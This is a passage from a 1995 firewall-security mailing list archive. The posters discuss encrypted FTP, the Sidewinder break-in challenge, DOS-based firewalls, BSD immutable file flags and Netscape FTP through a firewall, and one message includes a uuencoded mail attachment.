sledgehammer and sandpaper. (Which, cost notwithstanding, is very fun... you should try it sometime.) Because the discussion was SCSI, I assumed (along with the results of assuming, with an emphasis on the *me* portion) that everyone was talking about MS-DOS, even knowing that almost all of you are using Unix based systems. (Kind of the equivalent of describing the new Wonder Zap! flea collar at a dog show, and forgetting to mention it only works on cats.) :*( And, last but not least, because I've been shown *VERY* wrong on this one, *DO NOT* degauss a hard drive unless you know, or know someone who knows, what the heck you are doing! This is in regards to zapping your servo info with HD's using voice coil heads. I've spoken to my computer maintenance folks, and they said it's very likely, but they weren't sure (understandable, since we don't normally degauss our HD's.) However, I would like to point out that, I do know someone who has done it, and survived, but he retired and moved recently, so I won't be able to contact him to find out how he did it until this thread is forgotten. I wish I could provide technical details on this one (esp. since this is a technical list) but I'm not too knowledgeable on technical matters (I just play one on TV :*) ) but until I find out how he did it, please don't follow my advice by degaussing your HD. Mr. Lymn has stated that maybe he (my friend who zapped his HD) got lucky, or something, but like I said, unless you know someone who can rebuild HD's from scratch, please don't try this one at home... just in case. So, to stop wasting any more bandwidth than I have to... 1. Wipedisk is ONLY for government and military computers, and only for MS-DOS systems (but it *IS* for TS). 2. Civilians play by a different set of rules (with extra requirements) for the same information. 3. Mr. Lymn is technically knowledgeable, I'm not. Don't degauss your hard drive unless your a masochist. (Or a sadist who hates his/her computer maintenance folks.) Thanks for all the help in pointing out my mistakes, and I apologize for the misinformation I presented in my original post. (No, I'm not being smart... if people don't point out my mistakes, I can't learn. Once learning stops, it's time to take me out back and shoot me.) Thanks, Robert C. Tucker From firewalls-owner Thu Aug 10 07:00:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA19929 for firewalls-outgoing; Thu, 10 Aug 1995 06:54:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA19871 for ; Thu, 10 Aug 1995 06:53:51 -0700 From: Atkinson-K@smtpgw.nctsw.navy.mil Received: from unknown(138.145.2.3) by miles via smap (V1.3) id sma019851; Thu Aug 10 06:53:19 1995 Received: from smtpgw.nctsw.navy.mil by ns.nctsw.navy.mil (5.0/SMI-SVR4) id AA01265; Thu, 10 Aug 1995 09:48:55 +0500 Received: from ccMail by smtpgw.nctsw.navy.mil (IMA Internet Exchange 1.04b) id 02a0e060; Thu, 10 Aug 95 09:47:50 -0400 Mime-Version: 1.0 Date: Thu, 10 Aug 1995 09:54:40 -0400 Message-Id: <02a0e060@smtpgw.nctsw.navy.mil> Subject: Encripted ftp connections To: firewalls@GreatCircle.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part content-length: 1506 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Lyndon David wrote: >I have been tasked with setting up an ftp server to >communicate with a handfull of business partners. We >wish to have the ability for our partners to be able >to send and retrieve files from our server. Due to the >nature of the data the data must be encripted as it passes >over the Internet and stong authentication must be used >when they connect. >This is a commercial project and the data will cross >International bounderies, for this reason I do not want >to use encription technology such as pgp as some of the >countries will have problems with this. >Does anyone know of a hardware solution that can operate >between one local machine and 5 or 6 remote machines? The Message Security Protocol (don't recall the International Standard name for it) will provide the strong authentication and one to many requirements you have, but only for messages. In an international environment, you will have problems with just about any encryption capability you choose. >If encription of the data before transmission is mandated >what commercial encription can be used that will be >acceptable across International boarders and can anyone >think of a method where if someone forgot to encript the >data before transmission this would be caught and the >transfer stopped? There are Guards that will be coming available that will prevent unencrypted information from leaving an enclave and passing over a Network. ------------------------------ From firewalls-owner Thu Aug 10 08:23:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA21338 for firewalls-outgoing; Thu, 10 Aug 1995 07:24:19 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA21281 for ; Thu, 10 Aug 1995 07:24:11 -0700 Received: from unknown(137.39.156.214) by miles via smap (V1.3) id sma021269; Thu Aug 10 07:23:37 1995 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id KAA13372; Thu, 10 Aug 1995 10:28:54 -0400 From: "Marcus J. Ranum" Message-Id: <199508101428.KAA13372@switchblade.iwi.com> Subject: Re: s[id]ewinder To: smith@sctc.com (Rick Smith) Date: Thu, 10 Aug 1995 10:28:54 -0400 (EDT) Cc: firewalls@GreatCircle.COM, smith@sctc.com In-Reply-To: <199508092131.QAA05680@shade.sctc.com> from "Rick Smith" at Aug 9, 95 04:31:17 pm Reply-To: mjr@iwi.com Organization: Information Works! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 858 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rick Smith writes: >This is the weird part about having a challenge site. There are almost >as many rumors of successful attacks as there are unsuccessful attacks >(thousands, it would seem). That's one of the hazards of doing bogus challenges. My heart bleeds. Gould had the same kind of problem with their "break our C2!" challenge: someone social engineered it and they refused to pay off and the whole thing became an embarrassment. You risk the same kind of thing with the Sidewinder challenge. That's your decision and your problem, though. >The Challenge is to break through the firewall and extract a message >stored on the challenge site's LAN. I've never seen anyone broadcast >a copy of the message Question: Will SCC pay out if the message is broadcast REGARDLESS of the means by which it is discovered? Careful how you answer. :) mjr. From firewalls-owner Thu Aug 10 08:24:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA22728 for firewalls-outgoing; Thu, 10 Aug 1995 07:55:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA22701 for ; Thu, 10 Aug 1995 07:55:30 -0700 Received: from gmap15.leeds.ac.uk(129.11.84.200) by miles via smap (V1.3) id sma022661; Thu Aug 10 07:54:28 1995 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id PAA17432 for ; Thu, 10 Aug 1995 15:48:41 +0100 Received: from gmap.leeds.ac.uk (gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id PAA10850 for ; Thu, 10 Aug 1995 15:53:10 +0100 From: Danny Cox Date: Thu, 10 Aug 1995 15:50:22 +0100 Message-Id: <10421.9508101450@gmap.leeds.ac.uk> To: firewalls@greatcircle.com Subject: Running ISDN links using PPP - where should they go ? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk the subject says it all basically. It is critical to our operations here that we have some ISDN lines up to other sites. Given that we have a firewall running SOCKS here I want to keep these links outside our protected network. How have any of you done this ? Do you put it on the bastion host? I've only one, twin-home host with no CISCOs etc. Cheers all, Danny From firewalls-owner Thu Aug 10 08:54:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA22726 for firewalls-outgoing; Thu, 10 Aug 1995 07:55:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA22700 for ; Thu, 10 Aug 1995 07:55:30 -0700 Received: from uu11.psi.com(38.8.24.2) by miles via smap (V1.3) id sma022692; Thu Aug 10 07:55:02 1995 Received: from smtp1.essexgroup.com by uu11.psi.com (5.65b/4.0.940727-PSI/PSINet) via SMTP; id AA19314 for firewalls@greatcircle.com; Thu, 10 Aug 95 10:53:49 -0400 Received: by ESSEXGROUP.COM with Microsoft Mail id <302A39A4@ESSEXGROUP.COM>; Thu, 10 Aug 95 09:53:56 PDT From: "Chambers, M.A." To: "'firewalls@GreatCircle.COM'" Subject: Are there any NT Firewalls? Date: Thu, 10 Aug 95 09:57:00 PDT Message-Id: <302A39A4@ESSEXGROUP.COM> Encoding: 14 TEXT, 40 UUENCODE X-Mailer: Microsoft Mail V3.0 X-Ms-Attachment: WINMAIL.DAT 1491 00-00-1980 00:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have been watching this discuss for that past few months. During that time I haven't seen much of a discussion on any firewall products for NT. Does anyone know of a firewall product that will run under NT? We are looking for secure FTP and WWW connections. We are doing packet filtering with our routers, but we would like a more secure environment. Any rumors or facts about NT products would be appreciated. Thanks MC Chambers_Matt@Essexgroup.Com The following binary file has been uuencoded to ensure successful transmission. Use UUDECODE to extract. begin 600 WINMAIL.DAT M>)\^(B@.`0:0"``$```````!``$``0>0!@`(````Y`0```````#H``$(@`<` M&````$E032Y-:6-R;W-O9G0@36%I;"Y.;W1E`#$(`0V`!``"`````@`"``$$ M@`$`'````$%R92!T:&5R92!A;GD@3E0@1FER97=A;&QS/P"""0$%@`,`#@`` M`,L'"``*``D`.0`E``0`3P$!((`#``X```#+!P@`"@`)`#,`.P`$`%\!`0F` M`0`A````149#03!",T5%1D0R0T4Q,4)$-CDT,#`P,3`X0C$P,CD`1```$P`0```!P` M```G9FER97=A;&QS0$=R96%T0VER8VQE+D-/32<``@$+,`$````?````4TU4 M4#I&25)%5T%,3%-`1U)%051#25)#3$4N0T]-```#```Y``````L`0#H````` M`@'V#P$````$`````````C]6`0.0!@!``P``$`````L`(P```````P`F```` M```+`"D```````,`-@``````0``Y`,`[%Z(Q9[H!'@!P``$````<````07)E M('1H97)E(&%N>2!.5"!&:7)E=V%L;',_``(!<0`!````%@````&Z9S&B#SX+ MRO#2[Q'.O6E``!"+$"D```,`!A!1&#Z3`P`'$&\!```>``@0`0```&4```!) M2$%614)%14Y7051#2$E.1U1(25-$25-#55-31D]25$A!5%!!4U1&15=-3TY4 M2%-$55))3D=42$%45$E-14E(059%3E13145.355#2$]&041)4T-54U-)3TY/ M3D%.649)4D57``````(!"1`!````^P$``/$@=V'&=!%P"X!G('0:8`0@\F0$`&-U!!$"$`7`&K#]&C`@"K`3 MP!MP!]$$8`(PP&AS+B`@1`AQ&H/-&^%T!W$956XG!4`1L`D9\6UU$7`@;V8@ M>F$:]FD"(!]P`Z``<'GM&W!I%A`:(&P#(!-0!'"E'T!T&V1.5!T";P>1QR"Q M`B`9L&MN;P?@'X//(/X;M`/P(5%R=0.@)<#K!($B03\=$%<9L`K`&;#Y%:!O M:QIR&X(1L!LP)N%H1E10(*%D)I`HP"#]!:!N(S`AT"!!'/$*A2:ES&1O&G(* ML&-K$<`C\?YL$]`=4P/P&K`?<`AP):#S"&`KL7,L&<`LT!H0&;#*=PA@;"B@ M;&DK0!^A[P1@)N$GU0GP=B$``B`'@/4","X*A4$@P26P+H$$(/T%L68`T"'A M`:`LP2)!(7CW+;09T!^@; Thu, 10 Aug 1995 08:45:34 -0700 Received: from unknown(137.39.156.214) by miles via smap (V1.3) id sma024022; Thu Aug 10 08:44:38 1995 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id LAA13640; Thu, 10 Aug 1995 11:43:59 -0400 From: "Marcus J. Ranum" Message-Id: <199508101543.LAA13640@switchblade.iwi.com> Subject: Re: Multilevel Security is good for firewalls To: mcr@milkyway.com (Michael Richardson) Date: Thu, 10 Aug 1995 11:43:58 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <40bfkn$1vo@metis.milkyway.com> from "Michael Richardson" at Aug 9, 95 07:16:39 pm Reply-To: mjr@iwi.com Organization: Information Works! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 963 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Firewalls are *NOT* general purpose computing engines. Padgett >has suggested building firewalls out of 386SXs: one for each proxy >service! There's an outfit that builds a firewall running on DOS. When I first heard of it, I thought the idea was ridiculous, but in retrospect it's actually a really clever idea! There's no sendmail to worry about ("multitasking? Huh?") no network daemons, no NFS, no spending hours vetting your UNIX config to see what nonsense the vendor left there, etc, etc. If the firewall process crashes, the system instantly becomes inoperative. Pretty clever, really. Basically, you accept the fact that the firewall is a special purpose machine and treat it accordingly. I'd rather run DOS than B1, and frankly, I suspect a DOS box running a single program that just manages IP firewalling is a hell of a lot harder to break into than a CMW or some kind of UNIX box running B1. (and a little cheaper and easier to manage) mjr. From firewalls-owner Thu Aug 10 09:26:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA20746 for firewalls-outgoing; Thu, 10 Aug 1995 07:11:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA20715 for ; Thu, 10 Aug 1995 07:11:03 -0700 From: Maurice.Yergeau@Toro.Com Received: from lynux35.toro.com(170.92.1.180) by miles via smap (V1.3) id sma020708; Thu Aug 10 07:10:21 1995 Received: by lynux36.toro.com (Smail3.1.28.1 #3) id m0sgYAj-00024LC; Thu, 10 Aug 95 09:01 CDT Message-Id: Date: Thursday, 10 August 1995 9:08am CT To: firewalls@greatcircle.com Subject: anyone using NetGate 2.0 from smallworks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking at NetGate by SmallWorks to be used on a sparc 1 with 2 network cards. Has anyone had experience with this product or an older release. Please send comments directly to me. From firewalls-owner Thu Aug 10 09:45:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA24661 for firewalls-outgoing; Thu, 10 Aug 1995 08:59:44 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA24621 for ; Thu, 10 Aug 1995 08:59:37 -0700 Received: from unknown(137.39.156.214) by miles via smap (V1.3) id sma024611; Thu Aug 10 08:59:28 1995 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id MAA13722; Thu, 10 Aug 1995 12:04:51 -0400 From: "Marcus J. Ranum" Message-Id: <199508101604.MAA13722@switchblade.iwi.com> Subject: Re: Sidewinder challenge comments To: smith@sctc.com (Rick Smith) Date: Thu, 10 Aug 1995 12:04:51 -0400 (EDT) Cc: firewalls@GreatCircle.COM, smith@sctc.com In-Reply-To: <199508092016.PAA26323@shade.sctc.com> from "Rick Smith" at Aug 9, 95 03:16:51 pm Reply-To: mjr@iwi.com Organization: Information Works! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 655 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rick Smith writes: >There really haven't been that many attacks that are interesting from >a Firewalls standpoint. To paraphrase the Sidewinder FAQ, about 1% of >the attacks are really interesting, and most of those appear to come >from BSDI wizards probing our Type Enforcement implementation. Maybe >10% are competent but predictable attacks based on known weaknesses >like those published Cheswick & Bellovin. The rest are people who try >the easier things mentioned in C&B's "bombs" or in "Unix for Dummies." This basically confirms people's earlier observations that the benefit of such "challenges" is primarily marketing and not technical. mjr. From firewalls-owner Thu Aug 10 09:48:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA20896 for firewalls-outgoing; Thu, 10 Aug 1995 07:16:11 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA20843 for ; Thu, 10 Aug 1995 07:16:03 -0700 Received: from kant.newsedge.com(192.206.82.2) by miles via smap (V1.3) id sma020832; Thu Aug 10 07:15:53 1995 Received: from herne.newsedge.com by newsedge.com (4.1/SMI-4.1) id AA19660; Thu, 10 Aug 95 10:10:41 EDT Date: Thu, 10 Aug 95 10:17:34 EST Message-Id: <9508101017.AA16424@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: Re: sleazewinder X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Original-From: Frederick M Avolio Original-Date: Wed, 09 Aug 95 15:19:58 -0400 > > Where is OUR benefit from all the free work that the community at large has > > given you? >Well... You can look at it sort of like being a field test site. What >are the benefits? I mean, no one pays you to be a field test site for >a product. You can figure that the benefits are teh same as if you >were a test site: Every time I've been a test site I've been able to keep and continue using the product when I was done. :) From firewalls-owner Thu Aug 10 10:11:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23661 for firewalls-outgoing; Thu, 10 Aug 1995 08:29:39 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23633 for ; Thu, 10 Aug 1995 08:29:33 -0700 Received: from aegis.ptech.com(165.166.50.2) by miles via smap (V1.3) id sma023628; Thu Aug 10 08:29:18 1995 Received: from magnum.ptech.com by nexus.ptech.com (5.x/Piedmont Technology Group) id AA21060; Thu, 10 Aug 1995 11:28:12 -0400 From: clh@ptech.com (Charles L. Hutson) Message-Id: <9508101528.AA21060@nexus.ptech.com> Subject: Netscape's FTP through a Firewall To: firewalls@greatcircle.com Date: Thu, 10 Aug 95 11:27:18 EDT X-Mailer: ELM [version 2.3 PL0] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm having a problem using Netscape to FTP through my Firewall-1 firewall. I've done quite a bit of testing and research and have figured out that its because Netscape's version of ftp adheres to the specifications of RFC 1579. This RFC states that instead of doing a PORT command to tell the ftp server what port to open a data connection on, it does a PASV command. The following quote is from the above RFC: Fortunately, the necessary mechanisms already exist in the protocol. If the client sends a PASV command, the server will do a passive TCP open on some random port, and inform the client of the port number. The client can then do an active open to establish the connection. This is the part that confuses me. If the server is going to inform my client of the port number "on some random port", 1) How am I going to know which port to listen on to get this critical information? It seems like my ftp client would have to be frantically scanning the entire range above 1024 to get this information. 2) Isn't this going to force me to leave the entire range above 1024 wide open in my firewall configuration? As it stands, I can't FTP through Netscape because my firewall blocks that incomming random packet. Can anyone provide any suggestions. _______________________________________ / ____ _____ _____ \ Charles L. Hutson, clh@ptech.com / ____// // // ___ Technical Services \ Systems Engineer / // // //___// Division /\ Piedmont Technology Group /__________________________________________/ / Phone 704.523.2400 \__________________________________________\/ Fax 704.523.7764 From firewalls-owner Thu Aug 10 10:22:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA24440 for firewalls-outgoing; Thu, 10 Aug 1995 08:54:45 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA24386 for ; Thu, 10 Aug 1995 08:54:37 -0700 Received: from unknown(137.39.156.214) by miles via smap (V1.3) id sma024372; Thu Aug 10 08:53:49 1995 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id LAA13701; Thu, 10 Aug 1995 11:59:11 -0400 From: "Marcus J. Ranum" Message-Id: <199508101559.LAA13701@switchblade.iwi.com> Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: mdr@vodka.sse.att.com Date: Thu, 10 Aug 1995 11:59:11 -0400 (EDT) Cc: steveg@cseic.saic.com, firewalls@GreatCircle.COM In-Reply-To: <9508092126.AA00776@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 9, 95 05:27:59 pm Reply-To: mjr@iwi.com Organization: Information Works! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1682 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mdr@vodka.sse.att.com writes: >I don't know how BSD implements the sappnd or schg features for files. >But if it involves permission bits or other data in the inode of the >file, then it may be possilbe for a root user to change the inode's >contents by seeking to the appropriate spot on the block or raw device >and updating the inode. That's may sound hard to do, but it's not. The immutable bit stuff is pretty cleanly implemented and makes a lot of sense. Once you've put the system into multiuser mode, write access is disabled to the raw and cooked devices -- so forget using fsdb to pop the inode. Ditto kmem -- used to be you could pop the version of an inode in the kernel inode cache and not even have to touch the disk. :) >Alternatively, root can patch /unix or the running system image to >ignore the bits where ever they may be stored. Basically just replace >part of the code in the function that does the check with an early >return or jump or register set. [It's /bsd, not /unix. UNIX is a trademark of somebody or other and they used to sue people over that distinction. :)] Patching the running system image usually requires write access to /dev/kmem, etc, which is blocked in multiuser mode. I suppose you theoretically might manage to find a way of overrunning some part of the kernel to implement a "patch" to it, but the traditional tricks are blocked off. Patching the buffer cache, ditto. Patching the on-disk copy of the kernel would require writing the file, which, presumably, is something you'd want to keep immutable. The idea of immutable files is pretty sound, and the guys who did it have thought it through pretty thoroughly. mjr. From firewalls-owner Thu Aug 10 10:23:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA24332 for firewalls-outgoing; Thu, 10 Aug 1995 08:52:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA24294 for ; Thu, 10 Aug 1995 08:52:37 -0700 Received: from ereapp.erenj.com(159.70.31.2) by miles via smap (V1.3) id sma024230; Thu Aug 10 08:51:36 1995 Posted-Date: Thu, 10 Aug 1995 11:48:57 -0400 From: "Bryan D. Boyle" Message-Id: <9508101148.ZM18768@maverick.erenj.com> Date: Thu, 10 Aug 1995 11:48:56 -0400 In-Reply-To: "Marcus J. Ranum" "Re: s[id]ewinder" (Aug 10, 10:28am) References: <199508101428.KAA13372@switchblade.iwi.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: mjr@iwi.com Subject: Re: s[id]ewinder Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Aug 10, 10:28am, Marcus J. Ranum wrote: > Subject: Re: s[id]ewinder > Rick Smith writes: > >This is the weird part about having a challenge site. There are almost > >as many rumors of successful attacks as there are unsuccessful attacks > >(thousands, it would seem). > > That's one of the hazards of doing bogus challenges. My heart > bleeds. > > Gould had the same kind of problem with their "break our C2!" > challenge: someone social engineered it and they refused to pay off > and the whole thing became an embarrassment. You risk the same kind of > thing with the Sidewinder challenge. That's your decision and your > problem, though. > > >The Challenge is to break through the firewall and extract a message > >stored on the challenge site's LAN. I've never seen anyone broadcast > >a copy of the message > > Question: > Will SCC pay out if the message is broadcast REGARDLESS of the > means by which it is discovered? Careful how you answer. :) of course not. The fact that no one has publically broken it indicates: 1) no one really cares and has other things to do with limited time. 2) The challenge is that there really is no message, and finding that out is the key 3) the people you are trying to protect against aren't interested in proving a company's marketing claims. Reminds me of the build up to SATAN/SANTA and the bubble that burst. Not being broken does not, ipso facto, indicate that the system is secure. It can also indicate that there was not a concerted effort to do so. But, I guess, there is no limit to the hype that will come out of marcom types and plaid-suited sales strategists...:) -- Bryan D. Boyle | "It's when you think you've understood a problem #include | throughly that you are in real trouble..." EMAIL: bdboyle@erenj.com | -Pavel Chichikov ---------------------------------- -------------------- From firewalls-owner Thu Aug 10 10:59:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23692 for firewalls-outgoing; Thu, 10 Aug 1995 08:30:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23677 for ; Thu, 10 Aug 1995 08:30:33 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma023673; Thu Aug 10 08:30:27 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id KAA07209 for GreatCircle.COM!firewalls; Thu, 10 Aug 1995 10:09:23 -0500 Received: by ris1.nmti.com (smail2.5) id AA02958; 10 Aug 95 09:46:50 CDT (Thu) Received: by sonic.nmti.com; id AA13248; Thu, 10 Aug 1995 10:11:45 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508101511.AA13248@sonic.nmti.com.nmti.com> Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: mdr@vodka.sse.att.com Date: Thu, 10 Aug 1995 10:11:45 -0500 (CDT) Cc: steveg@cseic.saic.com, firewalls@GreatCircle.COM In-Reply-To: <9508092126.AA00776@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 9, 95 05:27:59 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 783 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I don't know how BSD implements the sappnd or schg features for files. > But if it involves permission bits or other data in the inode of the > file, then it may be possilbe for a root user to change the inode's > contents by seeking to the appropriate spot on the block or raw device > and updating the inode. That's may sound hard to do, but it's not. I think it is if the raw device is marked immutable. > Alternatively, root can patch /unix or the running system image to > ignore the bits where ever they may be stored. Unless /unix is immutable. > Any BSD guru's out there? Lots. Ask on the FreeBSD and NetBSD mailing lists. (I'm nowise a guru, though I did do some work on 386BSD and FreeBSD, mostly applications level hardening and improving the logging from ftpd) From firewalls-owner Thu Aug 10 11:08:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27218 for firewalls-outgoing; Thu, 10 Aug 1995 09:55:12 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27167 for ; Thu, 10 Aug 1995 09:55:04 -0700 From: JET@VAX8.CFSAN.FDA.GOV Received: from vax8.cfsan.fda.gov(150.148.80.20) by miles via smap (V1.3) id sma027146; Thu Aug 10 09:54:27 1995 Received: from VAX8.CFSAN.FDA.GOV by VAX8.CFSAN.FDA.GOV (PMDF V4.3-12 #8689) id <01HTWPU9N6PS000305@VAX8.CFSAN.FDA.GOV>; Thu, 10 Aug 1995 12:44:27 -0400 (EDT) Date: Thu, 10 Aug 1995 12:44:27 -0400 (EDT) Subject: Re: Multilevel Security is good for firewalls Cc: firewalls@greatcircle.com Message-id: <01HTWPU9PCW2000305@VAX8.CFSAN.FDA.GOV> X-VMS-To: SMTP%"mjr@iwi.com" X-VMS-Cc: IN%"firewalls@greatcircle.com" MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > There's an outfit that builds a firewall running on DOS. >When I first heard of it, I thought the idea was ridiculous, but >in retrospect it's actually a really clever idea! There's no sendmail >to worry about ("multitasking? Huh?") no network daemons, no NFS, >no spending hours vetting your UNIX config to see what nonsense >the vendor left there, etc, etc. If the firewall process crashes, >the system instantly becomes inoperative. Pretty clever, really. >Basically, you accept the fact that the firewall is a special purpose >machine and treat it accordingly. > I'd rather run DOS than B1, and frankly, I suspect a DOS >box running a single program that just manages IP firewalling is a >hell of a lot harder to break into than a CMW or some kind of UNIX >box running B1. (and a little cheaper and easier to manage) > >mjr. ...and the source is easy on the eyes! --John From firewalls-owner Thu Aug 10 11:09:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25647 for firewalls-outgoing; Thu, 10 Aug 1995 09:22:47 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25639 for ; Thu, 10 Aug 1995 09:22:45 -0700 From: phoenix@clark.net Received: from clark.net(168.143.0.7) by miles via smap (V1.3) id sma025637; Thu Aug 10 09:22:24 1995 Received: (phoenix@localhost) by clark.net (8.6.12/8.6.5) id MAA19096; Thu, 10 Aug 1995 12:21:15 -0400 Date: Thu, 10 Aug 1995 12:21:12 -0400 (EDT) To: "Chambers, M.A." cc: "'firewalls@GreatCircle.COM'" Subject: Re: Are there any NT Firewalls? In-Reply-To: <302A39A4@ESSEXGROUP.COM> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Funny... I seem to recall a substantial discussion on firewalls and Windows NT. I believe it was a month or two ago. In order to not go through all of this again, please look through the firewalls LISTERV archive. If you have questions above and beyond what was previously discussed, fire away. However, it sounds like a repeat/rehash of what has already been discussed. On Thu, 10 Aug 1995, Chambers, M.A. wrote: > > I have been watching this discuss for that past few months. During that > time I haven't seen much of a discussion on any firewall products for NT. > Does anyone know of a firewall product that will run under NT? We are > looking for secure FTP and WWW connections. > We are doing packet filtering with our routers, but we would like a more > secure environment. > Any rumors or facts about NT products would be appreciated. > > Thanks > MC > > Chambers_Matt@Essexgroup.Com > [snip, snip -- junk deleted] phoenix@clark.net From firewalls-owner Thu Aug 10 11:35:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA01011 for firewalls-outgoing; Thu, 10 Aug 1995 10:44:41 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA00962 for ; Thu, 10 Aug 1995 10:44:33 -0700 Received: from aegis.ptech.com(165.166.50.2) by miles via smap (V1.3) id sma000901; Thu Aug 10 10:43:35 1995 Received: from magnum.ptech.com by nexus.ptech.com (5.x/Piedmont Technology Group) id AA22534; Thu, 10 Aug 1995 13:42:32 -0400 From: clh@ptech.com (Charles L. Hutson) Message-Id: <9508101742.AA22534@nexus.ptech.com> Subject: Re: Netscape's FTP through a Firewall (fwd) To: firewalls@greatcircle.com Date: Thu, 10 Aug 95 13:41:38 EDT X-Mailer: ELM [version 2.3 PL0] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, this leads to another problem....I am using a proxy.....its Netscape's Proxy Server and it appears to implement ftp the same way. :| | | > Can anyone provide any suggestions ... | |Run a proxy, like CERN, on your firewall. | |/jordan | _______________________________________ / ____ _____ _____ \ Charles L. Hutson, clh@ptech.com / ____// // // ___ Technical Services \ Systems Engineer / // // //___// Division /\ Piedmont Technology Group /__________________________________________/ / Phone 704.523.2400 